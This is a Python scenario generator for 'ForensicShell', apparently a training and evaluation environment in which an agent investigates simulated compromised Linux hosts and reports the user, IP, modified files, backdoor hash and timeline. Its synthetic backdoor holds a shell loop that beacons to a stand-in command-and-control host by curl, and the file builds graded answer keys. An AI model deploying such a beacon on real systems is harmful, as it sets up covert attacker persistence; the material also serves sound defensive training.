forensic-shell / server /scenario_generator.py
yashppawar's picture
Upload folder using huggingface_hub
c36ffd2 verified
"""
Procedural scenario generator for ForensicShell.
Pure function of (seed, difficulty, pattern). Identical inputs always produce
identical scenarios, so seeds work as train/val/test splits and make curricula
reproducible. No global random state is touched.
Public API:
generate_scenario(seed, difficulty=3, pattern=None) -> dict
The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in
scenarios.py β€” it is a drop-in replacement the env can load through reset().
Difficulty tiers:
1 easy user + ip
2 medium + modified_files + backdoor_sha256
3 medium+ same as 2 but more noise
4 hard + timeline, with red-herring content
5 hard+ same as 4 with extra red herrings and more complex timeline
"""
from __future__ import annotations
import hashlib
import random
from datetime import datetime, timedelta
from types import SimpleNamespace
from typing import Dict, Optional
from .attack_patterns import PATTERNS
from .name_pools import (
DECOY_USERS,
HOSTNAMES,
sample_hostname,
sample_internal_ip,
sample_public_ip,
sample_username,
)
# ---------------------------------------------------------------------------
# Deterministic seed β†’ backdoor bytes
# ---------------------------------------------------------------------------
def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]:
"""
Return (bytes, sha256_hex, short_slug). Byte content is deterministic in
(seed, pattern) so two generated scenarios with the same seed/pattern have
the same SHA256 β€” matches what the grader will compare against.
"""
short = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6]
header = (
f"#!/bin/sh\n"
f"# synthetic payload {pattern}\n"
f"# seed={seed} slug={short}\n"
).encode()
body = (
f"while :; do\n"
f" curl -s -X POST http://c2.example/beacon -d \"id={short}\"\n"
f" sleep 60\n"
f"done\n"
).encode()
payload = header + body + hashlib.sha256(f"{seed}|{pattern}".encode()).digest()
return payload, hashlib.sha256(payload).hexdigest(), short
def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str:
"""Where the pattern drops its persistence blob."""
if pattern_tag == "webshell":
return f"/var/www/html/.{short}.bin"
if pattern_tag == "supply_chain":
return f"/tmp/.{short}"
if pattern_tag == "insider":
return "/tmp/.staging/dump.sql"
if pattern_tag == "ssh_key_theft":
return f"/usr/local/sbin/.{short}"
return f"/usr/local/bin/.{short}"
# ---------------------------------------------------------------------------
# Filesystem + ground-truth assembly
# ---------------------------------------------------------------------------
def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]:
"""Render benign, plausible auth log entries to pad the log."""
out = []
for i in range(lines):
ts = ts_base - timedelta(hours=rng.randint(1, 72), minutes=rng.randint(0, 59))
who = rng.choice(["ops", "alice", "bob", "jenkins", "monitoring", "deploy"])
internal = "10.0.0." + str(rng.randint(2, 200))
kind = rng.choice(["Accepted publickey", "session opened", "Received disconnect"])
if kind == "Accepted publickey":
out.append(
f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
f"Accepted publickey for {who} from {internal} port {rng.randint(30000, 65000)} ssh2"
)
elif kind == "session opened":
out.append(
f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
f"pam_unix(sshd:session): session opened for user {who} by (uid=0)"
)
else:
out.append(
f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
f"Received disconnect from {internal} port {rng.randint(30000, 65000)}:11: disconnected by user"
)
return out
def _passwd_file(main_user: str, rng) -> str:
users = list(DECOY_USERS) + [main_user]
rng.shuffle(users)
lines = ["root:x:0:0:root:/root:/bin/bash"]
uid = 1000
for u in users:
lines.append(f"{u}:x:{uid}:{uid}:{u.title()},,,:/home/{u}:/bin/bash")
uid += 1
return "\n".join(lines) + "\n"
def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict:
"""
Inject decoy content at difficulty >= 4.
Returns a dict of extra filesystem entries. None of these should end up in
ground_truth.modified_files.
intensity: 1 (diff 4) or 2 (diff 5+).
"""
extras = {}
# 1. Decoy auth.log.1 with a failed-login probe from an unrelated IP
decoy_ip = sample_public_ip(rng)
extras["/var/log/auth.log.1"] = (
f"{(ts_base - timedelta(days=1)).strftime('%b %d %H:%M:%S')} {host} "
f"sshd[101]: Failed password for invalid user admin from {decoy_ip} "
f"port {rng.randint(30000, 65000)} ssh2\n"
f"{(ts_base - timedelta(days=1, minutes=-3)).strftime('%b %d %H:%M:%S')} {host} "
f"sshd[104]: Received disconnect from {decoy_ip}: [preauth]\n"
)
# 2. A decoy user's bash_history with suspicious-looking-but-benign commands
decoy_user = rng.choice(DECOY_USERS)
extras[f"/home/{decoy_user}/.bash_history"] = (
"ls -la\n"
"sudo systemctl status cron\n"
"curl https://api.github.com/users/torvalds\n"
"python3 -m http.server 8000 &\n"
"pkill -f http.server\n"
)
if intensity >= 2:
# 3. A /tmp/.cache binary with random bytes β€” agent might stat/sha it and submit wrongly
junk = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4
extras["/tmp/.cache"] = junk
# 4. A decoy cron that looks suspicious but is benign
extras["/etc/cron.d/backup-nightly"] = (
"# Nightly backup β€” owned by ops team\n"
"0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n"
)
return extras
# ---------------------------------------------------------------------------
# Main public function
# ---------------------------------------------------------------------------
def generate_scenario(
seed: int,
difficulty: int = 3,
pattern: Optional[str] = None,
) -> Dict:
"""
Deterministic scenario generator.
Args:
seed: any integer β€” identical inputs yield identical scenarios
difficulty: 1..5 (clamped)
pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed
Returns:
dict with keys: task_id, difficulty, description, filesystem, ground_truth
"""
if difficulty < 1:
difficulty = 1
if difficulty > 5:
difficulty = 5
rng = random.Random(int(seed))
# 1. pick pattern
if pattern is None:
pattern = rng.choice(list(PATTERNS.keys()))
if pattern not in PATTERNS:
raise ValueError(f"unknown pattern: {pattern}")
# 2. sample entities
host = sample_hostname(rng)
main_user = sample_username(rng)
if pattern == "insider":
attacker_ip = sample_internal_ip(rng)
else:
attacker_ip = sample_public_ip(rng)
# 3. base timestamp β€” always in 2025, deterministic
day_offset = rng.randint(0, 365)
hour = rng.randint(8, 22)
minute = rng.randint(0, 59)
ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute)
# 4. synthesize backdoor payload
bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern)
bd_path = _backdoor_path_for(pattern, short, main_user)
ctx = SimpleNamespace(
rng=rng,
user=main_user,
ip=attacker_ip,
host=host,
ts_base=ts_base,
backdoor_bytes=bd_bytes,
backdoor_sha256=bd_sha,
backdoor_path=bd_path,
short=short,
)
# 5. run the pattern template
pattern_fn = PATTERNS[pattern]
result = pattern_fn(ctx)
# 6. build filesystem
noise = _legit_noise_auth_log(rng, host, ts_base, lines=6)
auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n"
filesystem: Dict[str, object] = {
"/var/log/auth.log": auth_log,
f"/home/{main_user}/.bash_history": result["bash_history"],
"/etc/passwd": _passwd_file(main_user, rng),
"/etc/hostname": f"{host}\n",
f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n",
}
# add pattern-specific modified files
for path, content in result["modified_files"].items():
filesystem[path] = content
# 7. red herrings
if difficulty >= 4:
intensity = 1 if difficulty == 4 else 2
herrings = _red_herrings(rng, host, ts_base, intensity)
for path, content in herrings.items():
if path in filesystem:
continue # never overwrite a real artifact
filesystem[path] = content
# 8. path-collision sanity check (duplicate keys impossible in a dict, but
# ensure every ground-truth path actually exists in the filesystem)
for p in result["modified_paths"]:
assert p in filesystem, f"ground-truth path not in filesystem: {p}"
# 9. assemble ground truth by difficulty tier
gt: Dict = {
"compromised_user": main_user,
"initial_ip": attacker_ip,
}
if difficulty >= 2:
gt["modified_files"] = list(result["modified_paths"])
gt["backdoor_sha256"] = bd_sha
if difficulty >= 4:
gt["timeline"] = list(result["timeline"])
task_id = f"gen_{int(seed)}_d{difficulty}_{pattern}"
description = _describe(difficulty, pattern, main_user, host)
return {
"task_id": task_id,
"difficulty": _difficulty_label(difficulty),
"description": description,
"filesystem": filesystem,
"ground_truth": gt,
}
# ---------------------------------------------------------------------------
# Small helpers
# ---------------------------------------------------------------------------
def _difficulty_label(d: int) -> str:
return {1: "easy", 2: "medium", 3: "medium", 4: "hard", 5: "hard"}.get(d, "medium")
def _describe(difficulty: int, pattern: str, user: str, host: str) -> str:
base = (
f"Host '{host}' was compromised. Investigate the filesystem to determine "
f"what happened. Start by reading /var/log/auth.log and the shell histories "
f"under /home."
)
if difficulty == 1:
return (
f"{base} Report: compromised_user and initial_ip only. "
f"(Pattern: {pattern})"
)
if difficulty in (2, 3):
return (
f"{base} Report: compromised_user, initial_ip, modified_files "
f"(absolute paths), and the SHA256 of the attacker-dropped backdoor. "
f"(Pattern: {pattern})"
)
return (
f"{base} Report: compromised_user, initial_ip, modified_files, "
f"backdoor_sha256, AND an ordered kill-chain timeline with phases "
f"login -> recon -> privesc -> persistence -> exfil. Red herrings may be "
f"present. (Pattern: {pattern})"
)